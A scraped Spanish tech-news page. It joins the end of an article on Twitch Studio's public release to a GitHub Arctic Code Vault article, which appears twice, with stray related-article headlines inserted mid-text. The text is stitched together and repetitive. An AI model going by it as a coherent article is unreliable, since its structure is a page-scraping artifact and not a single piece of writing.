Twitch lanzó esta aplicación en beta cerrada hace unos meses y, tras las pruebas de un grupo de usuarios elegidos, por fin está disponible para que todos podamos probarla.

Cómo activar el nuevo contador de FPS en la barra de juego de Windows 10
Eso significa que una vez que la instalemos nos irán llevando a través de una serie de pasos sencillos, para ajustar todos los parámetros y que el resultado (tanto de vídeo como de audio) parezca lo más profesional posible.
Imagen 13 11 19 9 49 Pegada
Twitch Studio se encargará de detectar automáticamente la webcam, el micrófono o la resolución de tu pantalla y ajustará todos los parámetros para sacar el mejor partido. Además, será posible personalizar el aspecto de nuestro streaming para darle mayor identidad a nuestro canal.
Imagen 13 11 19 9 18 Pegada
También cuenta con alertas integradas, lo que facilita a los que están llevando a cabo el streaming la monitorización y la interacción con los espectadores mediante el chat.
Hay que matizar que, de momento, Twitch Studio sólo está disponible para Windows (Windows 7 o superior). La compañía ha puntualizado ese "de momento", lo que significa que es probable que veamos llegar una versión para macOS, iOS o Android.

GitHub ha resguardado el código de Linux, Android y otros 6.000 proyectos open source dentro de una cueva en el Ártico

El pasado mes de octubre, Nat Friedman, actual CEO de la GitHub que fue comprada por Microsoft hace apenas un año, viajó al archipiélago Svalbard en el territorio noruego para almacenar el código de miles de proyectos open source en una cueva, ahí deberían conservarse para la posteridad.
Dentro de la cueva se encuentra lo que han llamado "The GitHub Arctic Code Vault", es decir, una bóveda que funciona como repositorio de datos dentro del Arctic World Archive, el archivo que se encarga de recoger el conocimiento y la sabiduría de la humanidad cerca y de forma similar a la famosa "bóveda del día del juicio final" que se inició hace años en Noruega para almacenar todas las semillas del mundo por si algún día hacían falta.

Creado para durar 1000 años

Arctic World Archive  
Arctic World Archive
El archivo está ubicado dentro de una antigua mina de carbón que está más cerca del Polo Norte que del Círculo Ártico. Dado que Svalbard es una zona desmilitarizada y también uno de los lugares más remotos y geopolíticamente estables del planeta, es el lugar más ideal para preservar semejante archivo.
Y por supuesto, es muy frío. Los científicos creen que el permafrost que lo rodea no se verá afectado de forma importante por el cambio climático en el futuro. Ahí dentro, los datos digitales han sido trasladados a una película analógica con múltiples capas que es capaz de almacenar los datos incluso por 1.000 años.
Ni servidores ni pendrives son lo suficientemente duraderos para almacenar información por tanto tiempo

Python supera a Java por primera vez en la lista de lenguajes de programación más populares en GitHub durante 2019
La película, que es básicamente un microfilm, es producida por la empresa noruega Piql, es almacenada en un contenedor de acero dentro de una cámara sellada en la mina. La empresa dice que el material debería durar hasta 750 años en condiciones normales, e incluso 2.000 años en una cueva fría, seca y baja en oxigeno.

GitHub planea almacenar 24.000 GB de código open source en la cueva

Social Card
En este viaje Friedman dejó el primero de 200 discos que planean almacenar dentro de la bóveda, cada uno contendrá unos 120 GB de código open source. En esta ocasión han incluido el código de Linux, Android y otras 6.000 aplicaciones open source importantes.
Un índice y una guía legibles para el ser humano detallarán la ubicación de cada repositorio y explicarán cómo recuperar los datos
El 2 de febrero de 2020, GitHub capturará una instantánea de cada repositorio público activo para ser preservada en la GitHub Arctic Code Vault. Cada repositorio se empaquetará como un único archivo TAR. Para una mayor densidad e integridad de los datos, la mayoría de ellos se almacenarán con codificación QR.
El archivo también incluirá información y orientación para la aplicación del código abierto, con el contexto de cómo lo utilizamos hoy en día, todo esto en caso de que los futuros lectores necesiten reconstruir las tecnologías desde cero.

GitHub ha resguardado el código de Linux, Android y otros 6.000 proyectos open source dentro de una cueva en el Ártico

GitHub ha resguardado el código de Linux, Android y otros 6.000 proyectos open source dentro de una cueva en el Ártico

El pasado mes de octubre, Nat Friedman, actual CEO de la GitHub que fue comprada por Microsoft hace apenas un año, viajó al archipiélago Svalbard en el territorio noruego para almacenar el código de miles de proyectos open source en una cueva, ahí deberían conservarse para la posteridad.
Dentro de la cueva se encuentra lo que han llamado "The GitHub Arctic Code Vault", es decir, una bóveda que funciona como repositorio de datos dentro del Arctic World Archive, el archivo que se encarga de recoger el conocimiento y la sabiduría de la humanidad cerca y de forma similar a la famosa "bóveda del día del juicio final" que se inició hace años en Noruega para almacenar todas las semillas del mundo por si algún día hacían falta.

Creado para durar 1000 años

Arctic World Archive  
Arctic World Archive
El archivo está ubicado dentro de una antigua mina de carbón que está más cerca del Polo Norte que del Círculo Ártico. Dado que Svalbard es una zona desmilitarizada y también uno de los lugares más remotos y geopolíticamente estables del planeta, es el lugar más ideal para preservar semejante archivo.
Y por supuesto, es muy frío. Los científicos creen que el permafrost que lo rodea no se verá afectado de forma importante por el cambio climático en el futuro. Ahí dentro, los datos digitales han sido trasladados a una película analógica con múltiples capas que es capaz de almacenar los datos incluso por 1.000 años.
Ni servidores ni pendrives son lo suficientemente duraderos para almacenar información por tanto tiempo

Python supera a Java por primera vez en la lista de lenguajes de programación más populares en GitHub durante 2019
La película, que es básicamente un microfilm, es producida por la empresa noruega Piql, es almacenada en un contenedor de acero dentro de una cámara sellada en la mina. La empresa dice que el material debería durar hasta 750 años en condiciones normales, e incluso 2.000 años en una cueva fría, seca y baja en oxigeno.

GitHub planea almacenar 24.000 GB de código open source en la cueva

Social Card
En este viaje Friedman dejó el primero de 200 discos que planean almacenar dentro de la bóveda, cada uno contendrá unos 120 GB de código open source. En esta ocasión han incluido el código de Linux, Android y otras 6.000 aplicaciones open source importantes.
Un índice y una guía legibles para el ser humano detallarán la ubicación de cada repositorio y explicarán cómo recuperar los datos
El 2 de febrero de 2020, GitHub capturará una instantánea de cada repositorio público activo para ser preservada en la GitHub Arctic Code Vault. Cada repositorio se empaquetará como un único archivo TAR. Para una mayor densidad e integridad de los datos, la mayoría de ellos se almacenarán con codificación QR.
El archivo también incluirá información y orientación para la aplicación del código abierto, con el contexto de cómo lo utilizamos hoy en día, todo esto en caso de que los futuros lectores necesiten reconstruir las tecnologías desde cero.